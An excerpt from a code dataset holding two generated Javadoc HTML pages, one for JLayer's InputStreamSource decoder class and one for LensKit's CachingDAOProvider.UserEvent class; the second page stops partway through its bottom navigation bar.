path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
doc/javazoom/jl/decoder/InputStreamSource.html | knocte/getittogether | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.4.2_05) on Fri Aug 13 10:56:33 CDT 2004 -->
<TITLE>
InputStreamSource
</TITLE>
<META NAME="keywords" CONTENT="javazoom.jl.decoder.InputStreamSource class">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
parent.document.title="InputStreamSource";
}
</SCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/InputStreamSource.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../javazoom/jl/decoder/Header.html" title="class in javazoom.jl.decoder"><B>PREV CLASS</B></A>
<A HREF="../../../javazoom/jl/decoder/JavaLayerUtils.html" title="class in javazoom.jl.decoder"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html" target="_top"><B>FRAMES</B></A>
<A HREF="InputStreamSource.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
javazoom.jl.decoder</FONT>
<BR>
Class InputStreamSource</H2>
<PRE>
java.lang.Object
<IMG SRC="../../../resources/inherit.gif" ALT="extended by"><B>javazoom.jl.decoder.InputStreamSource</B>
</PRE>
<DL>
<DT><B>All Implemented Interfaces:</B> <DD><A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></DD>
</DL>
<HR>
<DL>
<DT>public class <B>InputStreamSource</B><DT>extends java.lang.Object<DT>implements <A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></DL>
<P>
<i>Work In Progress.</i>
An instance of <code>InputStreamSource</code> implements a
<code>Source</code> that provides data from an <code>InputStream
</code>. Seeking functionality is not supported.
<P>
<P>
<DL>
<DT><B>Author:</B></DT>
<DD>MDM</DD>
</DL>
<HR>
<P>
<!-- ======== NESTED CLASS SUMMARY ======== -->
<!-- =========== FIELD SUMMARY =========== -->
<A NAME="field_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
<B>Field Summary</B></FONT></TD>
</TR>
</TABLE>
<A NAME="fields_inherited_from_class_javazoom.jl.decoder.Source"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TD><B>Fields inherited from interface javazoom.jl.decoder.<A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></B></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><A HREF="../../../javazoom/jl/decoder/Source.html#LENGTH_UNKNOWN">LENGTH_UNKNOWN</A></CODE></TD>
</TR>
</TABLE>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<A NAME="constructor_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
<B>Constructor Summary</B></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE><B><A HREF="../../../javazoom/jl/decoder/InputStreamSource.html#InputStreamSource(java.io.InputStream)">InputStreamSource</A></B>(java.io.InputStream in)</CODE>
<BR>
</TD>
</TR>
</TABLE>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=2><FONT SIZE="+2">
<B>Method Summary</B></FONT></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> boolean</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../javazoom/jl/decoder/InputStreamSource.html#isSeekable()">isSeekable</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> long</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../javazoom/jl/decoder/InputStreamSource.html#length()">length</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> int</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../javazoom/jl/decoder/InputStreamSource.html#read(byte[], int, int)">read</A></B>(byte[] b,
int offs,
int len)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> long</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../javazoom/jl/decoder/InputStreamSource.html#seek(long)">seek</A></B>(long to)</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> long</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../javazoom/jl/decoder/InputStreamSource.html#tell()">tell</A></B>()</CODE>
<BR>
</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> boolean</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../javazoom/jl/decoder/InputStreamSource.html#willReadBlock()">willReadBlock</A></B>()</CODE>
<BR>
</TD>
</TR>
</TABLE>
<A NAME="methods_inherited_from_class_java.lang.Object"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#EEEEFF" CLASS="TableSubHeadingColor">
<TD><B>Methods inherited from class java.lang.Object</B></TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD><CODE>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</CODE></TD>
</TR>
</TABLE>
<P>
<!-- ============ FIELD DETAIL =========== -->
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<A NAME="constructor_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=1><FONT SIZE="+2">
<B>Constructor Detail</B></FONT></TD>
</TR>
</TABLE>
<A NAME="InputStreamSource(java.io.InputStream)"><!-- --></A><H3>
InputStreamSource</H3>
<PRE>
public <B>InputStreamSource</B>(java.io.InputStream in)</PRE>
<DL>
</DL>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TD COLSPAN=1><FONT SIZE="+2">
<B>Method Detail</B></FONT></TD>
</TR>
</TABLE>
<A NAME="read(byte[], int, int)"><!-- --></A><H3>
read</H3>
<PRE>
public int <B>read</B>(byte[] b,
int offs,
int len)
throws java.io.IOException</PRE>
<DL>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../javazoom/jl/decoder/Source.html#read(byte[], int, int)">read</A></CODE> in interface <CODE><A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></CODE></DL>
</DD>
<DD><DL>
<DT><B>Throws:</B>
<DD><CODE>java.io.IOException</CODE></DL>
</DD>
</DL>
<HR>
<A NAME="willReadBlock()"><!-- --></A><H3>
willReadBlock</H3>
<PRE>
public boolean <B>willReadBlock</B>()</PRE>
<DL>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../javazoom/jl/decoder/Source.html#willReadBlock()">willReadBlock</A></CODE> in interface <CODE><A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="isSeekable()"><!-- --></A><H3>
isSeekable</H3>
<PRE>
public boolean <B>isSeekable</B>()</PRE>
<DL>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../javazoom/jl/decoder/Source.html#isSeekable()">isSeekable</A></CODE> in interface <CODE><A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="tell()"><!-- --></A><H3>
tell</H3>
<PRE>
public long <B>tell</B>()</PRE>
<DL>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../javazoom/jl/decoder/Source.html#tell()">tell</A></CODE> in interface <CODE><A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="seek(long)"><!-- --></A><H3>
seek</H3>
<PRE>
public long <B>seek</B>(long to)</PRE>
<DL>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../javazoom/jl/decoder/Source.html#seek(long)">seek</A></CODE> in interface <CODE><A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<HR>
<A NAME="length()"><!-- --></A><H3>
length</H3>
<PRE>
public long <B>length</B>()</PRE>
<DL>
<DD><DL>
<DT><B>Specified by:</B><DD><CODE><A HREF="../../../javazoom/jl/decoder/Source.html#length()">length</A></CODE> in interface <CODE><A HREF="../../../javazoom/jl/decoder/Source.html" title="interface in javazoom.jl.decoder">Source</A></CODE></DL>
</DD>
<DD><DL>
</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=3 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/InputStreamSource.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../javazoom/jl/decoder/Header.html" title="class in javazoom.jl.decoder"><B>PREV CLASS</B></A>
<A HREF="../../../javazoom/jl/decoder/JavaLayerUtils.html" title="class in javazoom.jl.decoder"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html" target="_top"><B>FRAMES</B></A>
<A HREF="InputStreamSource.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
javadoc/org/grouplens/lenskit/eval/traintest/CachingDAOProvider.UserEvent.html | ac0872/CTRecommenderLab | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_40) on Wed May 06 14:21:42 CDT 2015 -->
<title>CachingDAOProvider.UserEvent (LensKit 2.2)</title>
<meta name="date" content="2015-05-06">
<link rel="stylesheet" type="text/css" href="../../../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="CachingDAOProvider.UserEvent (LensKit 2.2)";
}
}
catch(err) {
}
//-->
var methods = {"i0":10};
var tabs = {65535:["t0","All Methods"],2:["t2","Instance Methods"],8:["t4","Concrete Methods"]};
var altColor = "altColor";
var rowColor = "rowColor";
var tableTab = "tableTab";
var activeTableTab = "activeTableTab";
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.User.html" title="class in org.grouplens.lenskit.eval.traintest"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../../org/grouplens/lenskit/eval/traintest/ExternalAlgorithm.html" title="class in org.grouplens.lenskit.eval.traintest"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/grouplens/lenskit/eval/traintest/CachingDAOProvider.UserEvent.html" target="_top">Frames</a></li>
<li><a href="CachingDAOProvider.UserEvent.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<div>
<ul class="subNavList">
<li>Summary: </li>
<li><a href="#nested.classes.inherited.from.class.org.grouplens.lenskit.eval.traintest.CachingDAOProvider">Nested</a> | </li>
<li>Field | </li>
<li><a href="#constructor.summary">Constr</a> | </li>
<li><a href="#method.summary">Method</a></li>
</ul>
<ul class="subNavList">
<li>Detail: </li>
<li>Field | </li>
<li><a href="#constructor.detail">Constr</a> | </li>
<li><a href="#method.detail">Method</a></li>
</ul>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<!-- ======== START OF CLASS DATA ======== -->
<div class="header">
<div class="subTitle">org.grouplens.lenskit.eval.traintest</div>
<h2 title="Class CachingDAOProvider.UserEvent" class="title">Class CachingDAOProvider.UserEvent</h2>
</div>
<div class="contentContainer">
<ul class="inheritance">
<li>java.lang.Object</li>
<li>
<ul class="inheritance">
<li><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html" title="class in org.grouplens.lenskit.eval.traintest">org.grouplens.lenskit.eval.traintest.CachingDAOProvider</a><<a href="../../../../../org/grouplens/lenskit/data/dao/PrefetchingUserEventDAO.html" title="class in org.grouplens.lenskit.data.dao">PrefetchingUserEventDAO</a>></li>
<li>
<ul class="inheritance">
<li>org.grouplens.lenskit.eval.traintest.CachingDAOProvider.UserEvent</li>
</ul>
</li>
</ul>
</li>
</ul>
<div class="description">
<ul class="blockList">
<li class="blockList">
<dl>
<dt>All Implemented Interfaces:</dt>
<dd>javax.inject.Provider<<a href="../../../../../org/grouplens/lenskit/data/dao/PrefetchingUserEventDAO.html" title="class in org.grouplens.lenskit.data.dao">PrefetchingUserEventDAO</a>></dd>
</dl>
<dl>
<dt>Enclosing class:</dt>
<dd><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider</a><<a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html" title="type parameter in CachingDAOProvider">T</a>></dd>
</dl>
<hr>
<br>
<pre>public static final class <span class="typeNameLabel">CachingDAOProvider.UserEvent</span>
extends <a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider</a><<a href="../../../../../org/grouplens/lenskit/data/dao/PrefetchingUserEventDAO.html" title="class in org.grouplens.lenskit.data.dao">PrefetchingUserEventDAO</a>></pre>
</li>
</ul>
</div>
<div class="summary">
<ul class="blockList">
<li class="blockList">
<!-- ======== NESTED CLASS SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="nested.class.summary">
<!-- -->
</a>
<h3>Nested Class Summary</h3>
<ul class="blockList">
<li class="blockList"><a name="nested.classes.inherited.from.class.org.grouplens.lenskit.eval.traintest.CachingDAOProvider">
<!-- -->
</a>
<h3>Nested classes/interfaces inherited from class org.grouplens.lenskit.eval.traintest.<a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider</a></h3>
<code><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.Item.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider.Item</a>, <a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.ItemEvent.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider.ItemEvent</a>, <a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.User.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider.User</a>, <a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.UserEvent.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider.UserEvent</a></code></li>
</ul>
</li>
</ul>
<!-- ======== CONSTRUCTOR SUMMARY ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.summary">
<!-- -->
</a>
<h3>Constructor Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructor Summary table, listing constructors, and an explanation">
<caption><span>Constructors</span><span class="tabEnd"> </span></caption>
<tr>
<th class="colOne" scope="col">Constructor and Description</th>
</tr>
<tr class="altColor">
<td class="colOne"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.UserEvent.html#UserEvent-org.grouplens.lenskit.data.dao.EventDAO-">UserEvent</a></span>(<a href="../../../../../org/grouplens/lenskit/data/dao/EventDAO.html" title="interface in org.grouplens.lenskit.data.dao">EventDAO</a> dao)</code> </td>
</tr>
</table>
</li>
</ul>
<!-- ========== METHOD SUMMARY =========== -->
<ul class="blockList">
<li class="blockList"><a name="method.summary">
<!-- -->
</a>
<h3>Method Summary</h3>
<table class="memberSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation">
<caption><span id="t0" class="activeTableTab"><span>All Methods</span><span class="tabEnd"> </span></span><span id="t2" class="tableTab"><span><a href="javascript:show(2);">Instance Methods</a></span><span class="tabEnd"> </span></span><span id="t4" class="tableTab"><span><a href="javascript:show(8);">Concrete Methods</a></span><span class="tabEnd"> </span></span></caption>
<tr>
<th class="colFirst" scope="col">Modifier and Type</th>
<th class="colLast" scope="col">Method and Description</th>
</tr>
<tr id="i0" class="altColor">
<td class="colFirst"><code>protected <a href="../../../../../org/grouplens/lenskit/data/dao/PrefetchingUserEventDAO.html" title="class in org.grouplens.lenskit.data.dao">PrefetchingUserEventDAO</a></code></td>
<td class="colLast"><code><span class="memberNameLink"><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.UserEvent.html#create-org.grouplens.lenskit.data.dao.EventDAO-">create</a></span>(<a href="../../../../../org/grouplens/lenskit/data/dao/EventDAO.html" title="interface in org.grouplens.lenskit.data.dao">EventDAO</a> dao)</code> </td>
</tr>
</table>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.org.grouplens.lenskit.eval.traintest.CachingDAOProvider">
<!-- -->
</a>
<h3>Methods inherited from class org.grouplens.lenskit.eval.traintest.<a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider</a></h3>
<code><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html#get--">get</a></code></li>
</ul>
<ul class="blockList">
<li class="blockList"><a name="methods.inherited.from.class.java.lang.Object">
<!-- -->
</a>
<h3>Methods inherited from class java.lang.Object</h3>
<code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<div class="details">
<ul class="blockList">
<li class="blockList">
<!-- ========= CONSTRUCTOR DETAIL ======== -->
<ul class="blockList">
<li class="blockList"><a name="constructor.detail">
<!-- -->
</a>
<h3>Constructor Detail</h3>
<a name="UserEvent-org.grouplens.lenskit.data.dao.EventDAO-">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>UserEvent</h4>
<pre>@Inject
public UserEvent(<a href="../../../../../org/grouplens/lenskit/data/dao/EventDAO.html" title="interface in org.grouplens.lenskit.data.dao">EventDAO</a> dao)</pre>
</li>
</ul>
</li>
</ul>
<!-- ============ METHOD DETAIL ========== -->
<ul class="blockList">
<li class="blockList"><a name="method.detail">
<!-- -->
</a>
<h3>Method Detail</h3>
<a name="create-org.grouplens.lenskit.data.dao.EventDAO-">
<!-- -->
</a>
<ul class="blockListLast">
<li class="blockList">
<h4>create</h4>
<pre>protected <a href="../../../../../org/grouplens/lenskit/data/dao/PrefetchingUserEventDAO.html" title="class in org.grouplens.lenskit.data.dao">PrefetchingUserEventDAO</a> create(<a href="../../../../../org/grouplens/lenskit/data/dao/EventDAO.html" title="interface in org.grouplens.lenskit.data.dao">EventDAO</a> dao)</pre>
<dl>
<dt><span class="overrideSpecifyLabel">Specified by:</span></dt>
<dd><code><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html#create-org.grouplens.lenskit.data.dao.EventDAO-">create</a></code> in class <code><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.html" title="class in org.grouplens.lenskit.eval.traintest">CachingDAOProvider</a><<a href="../../../../../org/grouplens/lenskit/data/dao/PrefetchingUserEventDAO.html" title="class in org.grouplens.lenskit.data.dao">PrefetchingUserEventDAO</a>></code></dd>
</dl>
</li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
</div>
<!-- ========= END OF CLASS DATA ========= -->
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li class="navBarCell1Rev">Class</li>
<li><a href="package-tree.html">Tree</a></li>
<li><a href="../../../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../../../index-all.html">Index</a></li>
<li><a href="../../../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script></div>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../../../org/grouplens/lenskit/eval/traintest/CachingDAOProvider.User.html" title="class in org.grouplens.lenskit.eval.traintest"><span class="typeNameLink">Prev Class</span></a></li>
<li><a href="../../../../../org/grouplens/lenskit/eval/traintest/ExternalAlgorithm.html" title="class in org.grouplens.lenskit.eval.traintest"><span class="typeNameLink">Next Class</span></a></li>
</ul>
<ul class="navList">
<li><a href="../../../../../index.html?org/grouplens/lenskit/eval/traintest/CachingDAOProvider.UserEvent.html" target="_top">Frames</a></li>
<li><a href="CachingDAOProvider.UserEvent.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
